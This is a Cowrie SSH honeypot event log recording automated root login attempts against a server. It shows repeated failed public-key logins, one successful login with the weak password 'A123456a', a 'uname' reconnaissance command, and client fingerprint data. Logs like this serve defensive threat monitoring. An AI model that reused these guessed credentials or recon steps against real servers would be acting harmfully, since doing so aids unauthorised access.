{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-26T12:19:29.971422Z","src_ip":"212.227.235.229","session":"7c33489a5933"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:29.972090Z","src_ip":"212.227.235.229","session":"7c33489a5933"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"92:53:c2:45:64:14:44:b5:bb:23:e7:0e:f1:43:d2:5f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDIHOZv7Y48fd8PViQw8eOnHzHW2ma+L9ATe2qfrvUvEsBgKG5sjQ95gsgbzQzsPvzutkesAuECtD3oj/USIe4eOqyOh/HG1a6MKuflXM3qQUEDaniKYYl2ppofsPdmI5bcgv/lY2ld44CeYIoPnO/FdSUcvNebbIQRkBmbekb+4uSKKOrSdRAuYYAOvLlPYXIcNHWF6pQMfTtqnM3G/hGf2htD0m4N5BuQqV4a5T3nvFnige9wBVCAg2jHOPD4Mx4UGbfG9LaR12rQ9KM0Gv5IDItdV14M81vSshwLBo0EvWYu5WgNoH34xJfRk21U469ve9Ve4AbP4K2Mbo3lSAsH","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 92:53:c2:45:64:14:44:b5:bb:23:e7:0e:f1:43:d2:5f","sensor":"my-vps","timestamp":"2025-08-26T12:19:30.179338Z","src_ip":"212.227.235.229","session":"7c33489a5933"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"92:53:c2:45:64:14:44:b5:bb:23:e7:0e:f1:43:d2:5f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDIHOZv7Y48fd8PViQw8eOnHzHW2ma+L9ATe2qfrvUvEsBgKG5sjQ95gsgbzQzsPvzutkesAuECtD3oj/USIe4eOqyOh/HG1a6MKuflXM3qQUEDaniKYYl2ppofsPdmI5bcgv/lY2ld44CeYIoPnO/FdSUcvNebbIQRkBmbekb+4uSKKOrSdRAuYYAOvLlPYXIcNHWF6pQMfTtqnM3G/hGf2htD0m4N5BuQqV4a5T3nvFnige9wBVCAg2jHOPD4Mx4UGbfG9LaR12rQ9KM0Gv5IDItdV14M81vSshwLBo0EvWYu5WgNoH34xJfRk21U469ve9Ve4AbP4K2Mbo3lSAsH","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:30.179927Z","src_ip":"212.227.235.229","session":"7c33489a5933"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:19:30.386808Z","src_ip":"212.227.235.229","session":"7c33489a5933"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50288,"dst_ip":"1.2.3.4","dst_port":22,"session":"d13fb41cd65e","protocol":"ssh","message":"New connection: 212.227.235.229:50288 (1.2.3.4:22) [session: d13fb41cd65e]","sensor":"my-vps","timestamp":"2025-08-26T12:19:30.593063Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-26T12:19:30.593796Z","src_ip":"212.227.235.229","session":"d13fb41cd65e"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":55550,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ef2c65f8fd4","protocol":"ssh","message":"New connection: 83.168.105.65:55550 (1.2.3.4:22) [session: 1ef2c65f8fd4]","sensor":"my-vps","timestamp":"2025-08-26T12:19:30.618737Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:19:30.619552Z","src_ip":"83.168.105.65","session":"1ef2c65f8fd4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:19:30.656297Z","src_ip":"83.168.105.65","session":"1ef2c65f8fd4"}
{"eventid":"cowrie.login.success","username":"root","password":"A123456a","message":"login attempt [root/A123456a] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:19:30.769779Z","src_ip":"83.168.105.65","session":"1ef2c65f8fd4"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T12:19:30.800203Z","src_ip":"212.227.235.229","session":"d13fb41cd65e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:19:30.862857Z","src_ip":"83.168.105.65","session":"1ef2c65f8fd4"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T12:19:30.863523Z","src_ip":"83.168.105.65","session":"1ef2c65f8fd4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:19:30.901629Z","src_ip":"83.168.105.65","session":"1ef2c65f8fd4"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:19:30.902872Z","src_ip":"83.168.105.65","session":"1ef2c65f8fd4"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-26T12:19:31.214877Z","src_ip":"212.227.235.229","session":"d13fb41cd65e"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:31.215686Z","src_ip":"212.227.235.229","session":"d13fb41cd65e"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"6e:ce:51:04:b9:f7:75:de:2d:68:6a:b2:3a:6f:30:20","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAABAEAwsFzinSlj2egX2w1f3F0UrJWtt8ywSUuU6qWF0AOWhTTSQlHK1L+3aWMDJJFs9CE649Ur+E/x/5Q4ZR8Vl3u4K/do1/Gy3M+S8nFEdqAYv8RPvtAbxw2YnbtezeE9RXwLazjRC4EY3BDMdlLqOJ5LlBZnw36dsEwxjODaJtrXW61cV9VOuTcKr8VeBeOWw3n4DWFKES45QBI2OVyb4c0IcdgbJKJkRla/GqZVwPgK4YlkZg+LNhVk/TUtb5xWAWFCA9cXyIAHgYp83byluaA9+jHydXWpERLQtkw7Ea4V0O9FlHX34PYntLp10onBFKHgLvVz+Moxbe4vOi/c396LWd2b1XwqqWuXRyLp0YKcHwr9/A6NsTZCxWCQfXdw0l+86h/rW0CXgJXINhnkuYqO5QLIYCPMs08wqYd84ga/72tDYcAIq7Ga8Rl9nbV2Zs4h4YQ40lFsf0ou1EzgWoI4rrQLSXKvr5inBLTXG7zkIutGyM74EHio6hOGrSQgW47o8EtrctI/MAwjQJqnbHtfftZNCuAP+qKCsVEyG/LEG601r1JsW00Zl84ew5SEOzqE0CjJWGzT1T67+UNRWlIISIphJCi1+VTNykQHrfq1210VswCNKO10YNZRVS7VEbJY/Y7ea1b4q/VcDH/rE6ncDYcbfoBgEsW9ADZkZ7WV97yExIpnJDeoYBG27AQWkZL8bN8WZJ20doPvvxQyxI6go3l9LkXWNm3jFIdnqSCgLQvFz/UCtjtDxmnIzdNRN+B0QchMzRyir+iwBRdF9LCco31HkOQvGFfD7irXNbfzQ7TzFOYm2e9fcb3Hu/BYunpRNsz/k3OPtkRkpvFyjxnu1bISWI1/z/YMVnT9AnWuKztZfkwkOWyVpo1AswBwfz6CLCC29khQNKNOjuXAcCRMg2dem90QlgbM2H+qNlgbhiJHBAicvjrDU1dzQehUALRDP/ruPc2J1e8BGcsc4lr7qF0e/HjxF68rRZP7e9gIit1EYnm8Vh5KlY7dHbz1Canek5DijZAp0HiEM+W35QB8lvuUFXPS1rC2Uh5yevJXucm2jZvGlmKx69BhUmJn1yPwXu37bqxXAApKZLUkVdjC6K4esjSgBc1KHEAGGR5PbBC3gjlR3I91n+290kWxln3SRjYWrNd0n4LTzmij92gmQzI5jMV49cCgqyxgCd49HhVLUpZ50O1IgLqTgu0uf/fueQtVho/JoQy1pvvAIPt03qJwi1OG48GDlONEhZqms1wpXXng8RTDTTl44lbSB7TN3HB9bZmnpb5Eyc0Wt8srkFn2GFDcrLIU3PHjGTRwZzqEZK5V9jhNg46ZRgFLRPt2RmYQNLjIaLWgqQeDSWO3Q==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 6e:ce:51:04:b9:f7:75:de:2d:68:6a:b2:3a:6f:30:20","sensor":"my-vps","timestamp":"2025-08-26T12:19:31.423378Z","src_ip":"212.227.235.229","session":"d13fb41cd65e"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"6e:ce:51:04:b9:f7:75:de:2d:68:6a:b2:3a:6f:30:20","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAABAEAwsFzinSlj2egX2w1f3F0UrJWtt8ywSUuU6qWF0AOWhTTSQlHK1L+3aWMDJJFs9CE649Ur+E/x/5Q4ZR8Vl3u4K/do1/Gy3M+S8nFEdqAYv8RPvtAbxw2YnbtezeE9RXwLazjRC4EY3BDMdlLqOJ5LlBZnw36dsEwxjODaJtrXW61cV9VOuTcKr8VeBeOWw3n4DWFKES45QBI2OVyb4c0IcdgbJKJkRla/GqZVwPgK4YlkZg+LNhVk/TUtb5xWAWFCA9cXyIAHgYp83byluaA9+jHydXWpERLQtkw7Ea4V0O9FlHX34PYntLp10onBFKHgLvVz+Moxbe4vOi/c396LWd2b1XwqqWuXRyLp0YKcHwr9/A6NsTZCxWCQfXdw0l+86h/rW0CXgJXINhnkuYqO5QLIYCPMs08wqYd84ga/72tDYcAIq7Ga8Rl9nbV2Zs4h4YQ40lFsf0ou1EzgWoI4rrQLSXKvr5inBLTXG7zkIutGyM74EHio6hOGrSQgW47o8EtrctI/MAwjQJqnbHtfftZNCuAP+qKCsVEyG/LEG601r1JsW00Zl84ew5SEOzqE0CjJWGzT1T67+UNRWlIISIphJCi1+VTNykQHrfq1210VswCNKO10YNZRVS7VEbJY/Y7ea1b4q/VcDH/rE6ncDYcbfoBgEsW9ADZkZ7WV97yExIpnJDeoYBG27AQWkZL8bN8WZJ20doPvvxQyxI6go3l9LkXWNm3jFIdnqSCgLQvFz/UCtjtDxmnIzdNRN+B0QchMzRyir+iwBRdF9LCco31HkOQvGFfD7irXNbfzQ7TzFOYm2e9fcb3Hu/BYunpRNsz/k3OPtkRkpvFyjxnu1bISWI1/z/YMVnT9AnWuKztZfkwkOWyVpo1AswBwfz6CLCC29khQNKNOjuXAcCRMg2dem90QlgbM2H+qNlgbhiJHBAicvjrDU1dzQehUALRDP/ruPc2J1e8BGcsc4lr7qF0e/HjxF68rRZP7e9gIit1EYnm8Vh5KlY7dHbz1Canek5DijZAp0HiEM+W35QB8lvuUFXPS1rC2Uh5yevJXucm2jZvGlmKx69BhUmJn1yPwXu37bqxXAApKZLUkVdjC6K4esjSgBc1KHEAGGR5PbBC3gjlR3I91n+290kWxln3SRjYWrNd0n4LTzmij92gmQzI5jMV49cCgqyxgCd49HhVLUpZ50O1IgLqTgu0uf/fueQtVho/JoQy1pvvAIPt03qJwi1OG48GDlONEhZqms1wpXXng8RTDTTl44lbSB7TN3HB9bZmnpb5Eyc0Wt8srkFn2GFDcrLIU3PHjGTRwZzqEZK5V9jhNg46ZRgFLRPt2RmYQNLjIaLWgqQeDSWO3Q==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:31.424215Z","src_ip":"212.227.235.229","session":"d13fb41cd65e"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:19:31.631753Z","src_ip":"212.227.235.229","session":"d13fb41cd65e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50298,"dst_ip":"1.2.3.4","dst_port":22,"session":"273d6ad5cfec","protocol":"ssh","message":"New connection: 212.227.235.229:50298 (1.2.3.4:22) [session: 273d6ad5cfec]","sensor":"my-vps","timestamp":"2025-08-26T12:19:31.831088Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-26T12:19:31.831939Z","src_ip":"212.227.235.229","session":"273d6ad5cfec"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T12:19:32.033157Z","src_ip":"212.227.235.229","session":"273d6ad5cfec"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-26T12:19:32.436328Z","src_ip":"212.227.235.229","session":"273d6ad5cfec"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:32.436939Z","src_ip":"212.227.235.229","session":"273d6ad5cfec"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"83:7a:04:22:5d:76:74:7a:a8:76:76:91:19:bb:73:16","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCBBNG9ZWFubdzlVhtetnJwslvXGX4+/xBYiTwufkD05brVannOmn7WnRoh6jq/TIZdo1kC7732/AoUMA98dtHeQ6YflAFbuD7JdgNy1SFeqTHJCBXc2ejFAa+uamDJsNHUKpke9QHUgBW0piXp1ChhXu94rRTJ2wGzBM0uy9C0FhU4pjMAzsb+C1XI8V/H6SID9bsVgymPCto85giCXNjSj4LaZXpAVHRXOmenDODjLPhL6b9IdEsFigDYtthaqNyk+w9WrMfN4sjNHq7y9p60attSSVisAU58zJ2fsZotiVPByik7IXyLRqzd27IAlCLgUq6I+hLkQfqYr5/khVv3","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 83:7a:04:22:5d:76:74:7a:a8:76:76:91:19:bb:73:16","sensor":"my-vps","timestamp":"2025-08-26T12:19:32.638749Z","src_ip":"212.227.235.229","session":"273d6ad5cfec"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"83:7a:04:22:5d:76:74:7a:a8:76:76:91:19:bb:73:16","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCBBNG9ZWFubdzlVhtetnJwslvXGX4+/xBYiTwufkD05brVannOmn7WnRoh6jq/TIZdo1kC7732/AoUMA98dtHeQ6YflAFbuD7JdgNy1SFeqTHJCBXc2ejFAa+uamDJsNHUKpke9QHUgBW0piXp1ChhXu94rRTJ2wGzBM0uy9C0FhU4pjMAzsb+C1XI8V/H6SID9bsVgymPCto85giCXNjSj4LaZXpAVHRXOmenDODjLPhL6b9IdEsFigDYtthaqNyk+w9WrMfN4sjNHq7y9p60attSSVisAU58zJ2fsZotiVPByik7IXyLRqzd27IAlCLgUq6I+hLkQfqYr5/khVv3","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:32.639353Z","src_ip":"212.227.235.229","session":"273d6ad5cfec"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:19:32.841009Z","src_ip":"212.227.235.229","session":"273d6ad5cfec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50314,"dst_ip":"1.2.3.4","dst_port":22,"session":"e87ca4e235a7","protocol":"ssh","message":"New connection: 212.227.235.229:50314 (1.2.3.4:22) [session: e87ca4e235a7]","sensor":"my-vps","timestamp":"2025-08-26T12:19:33.040440Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-26T12:19:33.042239Z","src_ip":"212.227.235.229","session":"e87ca4e235a7"}
